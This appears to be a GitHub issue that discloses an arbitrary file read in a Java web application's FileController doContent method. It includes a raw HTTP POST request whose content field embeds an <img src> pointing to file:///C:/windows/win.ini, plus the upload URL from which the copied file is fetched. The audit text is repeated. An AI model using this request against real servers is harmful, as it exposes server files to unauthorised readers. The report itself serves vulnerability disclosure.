You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Code Audit:
The doContent method in src/main/java/com/mysiteform/admin/controller/system/FileController. java does not filter the incoming content
Follow up with uploadLocalImg, the general process is to read the file based on the passed file name, and then upload it to the static/upload/directory
Vulnerability exploitation:
POST /file/doContent HTTP/1.1
Host: 192.168.52.132:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Cookie: JSESSIONID=b566f4d3-be2c-45a5-b4a6-f9e3d35e7b11
Content-Length: 46
content=<img src="file:///C:/windows/win.ini">
Code Audit:
The doContent method in src/main/java/com/mysiteform/admin/controller/system/FileController. java does not filter the incoming content
Follow up with uploadLocalImg, the general process is to read the file based on the passed file name, and then upload it to the static/upload/directory
Vulnerability exploitation:
Open and return: http://192.168.52.132:8080/static/upload/00a4a07c -9023-45e4-8229-8f3f0ddcfccd.ini
The text was updated successfully, but these errors were encountered: